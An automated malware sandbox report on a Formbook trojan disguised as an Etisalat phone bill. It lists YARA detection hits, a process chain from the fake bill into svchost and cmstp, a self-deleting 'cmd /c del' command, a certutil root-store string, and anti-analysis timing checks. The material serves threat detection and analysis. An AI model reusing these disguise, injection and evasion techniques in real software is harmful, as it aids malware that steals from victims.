Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Details of Your Etisalat Summary Bill for the Month of May 2024.exe PID: 5772, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 4428, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 1472, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/4@11/5
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCA2D5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BB8713 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BB8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00AD8F05 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,InitiateSystemShutdownW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BDF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BD86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B64FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | File created: C:\Users\user\AppData\Local\Temp\autF8D9.tmp
Source: C:\Windows\SysWOW64\cmstp.exe | Command line argument: kernel32.dll (4_2_00AD6052)
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | ReversingLabs: Detection: 36%
Source: cmstp.exe | String found in binary or memory: /k certutil.exe -f -enterprise -v -addstore Root "%s"
Source: unknown | Process created: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static file information: File size 1062400 > 1048576
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cmstp.pdbGCTL source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BDC304 LoadLibraryA,GetProcAddress, 0_2_00BDC304
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00B88B85 push ecx; ret 0_2_00B88B98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419196 push FFFFFF8Ah; ret 2_2_0041919C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EA01 push dword ptr [253FD125h]; ret 2_2_0041EB0F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D4FB push eax; ret 2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041D55C push eax; ret 2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300225F pushad ; ret 2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030027FA pushad ; ret 2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300283D push eax; iretd 2_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300135E push eax; iretd 2_2_03001369
Source: C:\Windows\explorer.exe Code function: 3_2_109629B5 push esp; retn 0000h 3_2_10962AE7
Source: C:\Windows\explorer.exe Code function: 3_2_10962B1E push esp; retn 0000h 3_2_10962B1F
Source: C:\Windows\explorer.exe Code function: 3_2_10962B02 push esp; retn 0000h 3_2_10962B03
Source: C:\Windows\explorer.exe Code function: 3_2_10E099B5 push esp; retn 0000h 3_2_10E09AE7
Source: C:\Windows\explorer.exe Code function: 3_2_10E09B02 push esp; retn 0000h 3_2_10E09B03
Source: C:\Windows\explorer.exe Code function: 3_2_10E09B1E push esp; retn 0000h 3_2_10E09B1F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00AE1A3D push ecx; ret 4_2_00AE1A50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04D027FA pushad ; ret 4_2_04D027F9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04D0225F pushad ; ret 4_2_04D027F9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04D0283D push eax; iretd 4_2_04D02858
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04D309AD push ecx; mov dword ptr [esp], ecx 4_2_04D309B6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E59196 push FFFFFF8Ah; ret 4_2_02E5919C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E5D4F2 push eax; ret 4_2_02E5D4F8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E5D4FB push eax; ret 4_2_02E5D562
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E5D4A5 push eax; ret 4_2_02E5D4F8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E5D55C push eax; ret 4_2_02E5D562
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E5EA01 push dword ptr [253FD125h]; ret 4_2_02E5EB0F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_02E5DEF2 push esp; iretd 4_2_02E5DEF9
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe File created: \details of your etisalat summary bill for the month of may 2024.exe
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADCAB4 GetSystemDirectoryW,memset,GetPrivateProfileStringW,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,CmFree, 4_2_00ADCAB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00AD5DEC memset,GetPrivateProfileStringW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcAddress,GetProcAddress,FreeLibrary, 4_2_00AD5DEC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADA6EE GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,LoadStringW,LoadStringW,lstrlenW,lstrlenW,lstrlenW,LoadStringW,LoadStringW,MessageBoxW,LoadStringW,GetSystemDirectoryW,LoadStringW,MessageBoxW, 4_2_00ADA6EE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADB634 LoadStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileIntW,LoadStringW,MessageBoxW,CmFree,CmFree,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LoadStringW,MessageBoxW,memset,memset,memset,RegOpenKeyExW,RegQueryValueExW,ExpandEnvironmentStringsW,lstrcmpiW,LoadStringW,MessageBoxW,RegCloseKey,LoadStringW,RegCreateKeyW,lstrlenW,RegSetValueExW,LoadStringW,MessageBoxW,RegCloseKey,RegCloseKey,memset,memset,CopyFileW,LoadStringW,MessageBoxW,GetOSVersion,GetOSMajorVersion,CmMalloc,memset,CmFree,CmMalloc,memset,GetLastError,CmFree,lstrlenW,CmMalloc,lstrlenW,CmFree,CmFree,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,LoadStringW,MessageBoxExW,CmMalloc,memset,CmFree,CmMalloc, 4_2_00ADB634
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADD233 RegOpenKeyExW,GetPrivateProfileIntW,GetSystemDirectoryW,memset,GetPrivateProfileStringW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,memset,RegEnumValueW,RegCloseKey, 4_2_00ADD233
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADDD1E memset,memset,memset,memset,LoadStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,RegCreateKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrlenW,memset,lstrlenW,lstrlenW,RegSetValueExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,CmMalloc,CreateFileW,CloseHandle,CmFree,CmFree,GetPrivateProfileIntW,SetFileAttributesW,SHFileOperationW,RegCloseKey,RegCloseKey, 4_2_00ADDD1E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADA068 memset,memset,RegOpenKeyExW,RegQueryValueExW,lstrcmpiW,LoadStringW,MessageBoxW,RegCloseKey,GetPrivateProfileIntW,GetPrivateProfileIntW,LoadStringW,LoadStringW,LoadStringW,MessageBoxW,GetSystemDirectoryW, 4_2_00ADA068
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADA47F RegOpenKeyExW,RegQueryValueExW,GetPrivateProfileIntW,RegQueryValueExW,RegQueryValueExW,RegCloseKey, 4_2_00ADA47F
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00B64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00B64A35
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BE55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00BE55FD
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00B833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B833C7
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 2E49904 second address: 2E4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 2E49B6E second address: 2E49B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3968
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5975
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 882
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 1800
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 8170
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-100066
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 1.6 %
Source: C:\Windows\SysWOW64\cmstp.exe API coverage: 1.2 %
Source: C:\Windows\explorer.exe TID: 6008 Thread sleep count: 3968 > 30
Source: C:\Windows\explorer.exe TID: 6008 Thread sleep time: -7936000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6008 Thread sleep count: 5975 > 30
Source: C:\Windows\explorer.exe TID: 6008 Thread sleep time: -11950000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372 Thread sleep count: 1800 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372 Thread sleep time: -3600000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372 Thread sleep count: 8170 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372 Thread sleep time: -16340000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BC4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00BC4696
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BCC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00BCC9C7
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BCC93C FindFirstFileW,FindClose, 0_2_00BCC93C
